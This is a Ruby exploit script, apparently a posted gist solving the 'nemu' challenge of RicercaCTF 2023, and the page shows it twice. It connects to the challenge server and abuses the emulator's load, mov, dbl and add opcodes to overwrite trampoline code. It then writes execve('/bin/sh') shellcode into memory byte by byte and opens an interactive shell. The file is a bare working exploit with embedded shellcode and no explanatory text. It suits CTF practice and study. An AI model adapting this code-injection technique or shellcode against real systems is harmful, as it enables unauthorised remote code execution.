cookie-s/ricercactf2023-nemu.rb Secret

## ricercactf2023-nemu.rb
require 'socket'
require 'expect'
require 'io/interactive'

class S < TCPSocket
  def wait
    # expect 'opcode:'
  end

  def initialize
    # super 'localhost', 4567
    super 'nemu.2023.ricercactf.com', 9002
  end

  def load imm
    wait
    puts 1
    puts '#%d' % imm
  end
  def mov reg
    wait
    puts 2
    puts 'r%d' % reg
  end
  def dbl reg
    wait
    puts 4
    puts 'r%d' % reg
  end
  def addi imm
    wait
    puts 5
    puts '#%d' % imm
  end
  def add reg
    wait
    puts 6
    puts 'r%d' % reg
  end
end

# 0x7fffffffdcd0 ra
# 0x7fffffffdcd4 r3
# 0x7fffffffdcd8 r2
# 0x7fffffffdcdc r1
# 0x7fffffffdce0 trampoline.add
# 0x7fffffffdcfc trampoline.addi
# 0x7fffffffdd18 trampoline.dbl

s = S.new
s.load 0x90909057   # push rdi
s.mov 1             # r1 <- push rdi
32.times{ s.dbl 1 } # *trampoline.add <- push rdi

# https://shell-storm.org/shellcode/files/shellcode-806.html
x = '31c048bbd19d9691d08c97ff48f7db53545f995257545eb03b0f05'
shellcode = [x.split.join].pack("H*")

shellcode.bytes.each_with_index do |b, i|
  # s.load 0x032847c6; s.mov 3 # mov BYTE PTR [rdi+0x28],3 = mov BYTE PTR [cfc], 3

  x = [b, 0x28 + i, 0x47, 0xc6].pack("C*").unpack1("N")
  s.load x;          s.mov 3 ; # r3 <- mov BYTE PTR [rdi+0x28+i], b
  s.load 0x000000c3; s.mov 2 ; # r2 <- ret
  s.add 3 # call trampoline.add with rdi=&r3
end

s.addi 0 # jmp to trampoline.addi

s.interactive! # shell!
	require 'socket'
	require 'expect'
	require 'io/interactive'

	class S < TCPSocket
	def wait
	# expect 'opcode:'
	end

	def initialize
	# super 'localhost', 4567
	super 'nemu.2023.ricercactf.com', 9002
	end

	def load imm
	wait
	puts 1
	puts '#%d' % imm
	end
	def mov reg
	wait
	puts 2
	puts 'r%d' % reg
	end
	def dbl reg
	wait
	puts 4
	puts 'r%d' % reg
	end
	def addi imm
	wait
	puts 5
	puts '#%d' % imm
	end
	def add reg
	wait
	puts 6
	puts 'r%d' % reg
	end
	end

	# 0x7fffffffdcd0 ra
	# 0x7fffffffdcd4 r3
	# 0x7fffffffdcd8 r2
	# 0x7fffffffdcdc r1
	# 0x7fffffffdce0 trampoline.add
	# 0x7fffffffdcfc trampoline.addi
	# 0x7fffffffdd18 trampoline.dbl

	s = S.new
	s.load 0x90909057 # push rdi
	s.mov 1 # r1 <- push rdi
	32.times{ s.dbl 1 } # *trampoline.add <- push rdi

	# https://shell-storm.org/shellcode/files/shellcode-806.html
	x = '31c048bbd19d9691d08c97ff48f7db53545f995257545eb03b0f05'
	shellcode = [x.split.join].pack("H*")

	shellcode.bytes.each_with_index do \|b, i\|
	# s.load 0x032847c6; s.mov 3 # mov BYTE PTR [rdi+0x28],3 = mov BYTE PTR [cfc], 3

	x = [b, 0x28 + i, 0x47, 0xc6].pack("C*").unpack1("N")
	s.load x; s.mov 3 ; # r3 <- mov BYTE PTR [rdi+0x28+i], b
	s.load 0x000000c3; s.mov 2 ; # r2 <- ret
	s.add 3 # call trampoline.add with rdi=&r3
	end

	s.addi 0 # jmp to trampoline.addi

	s.interactive! # shell!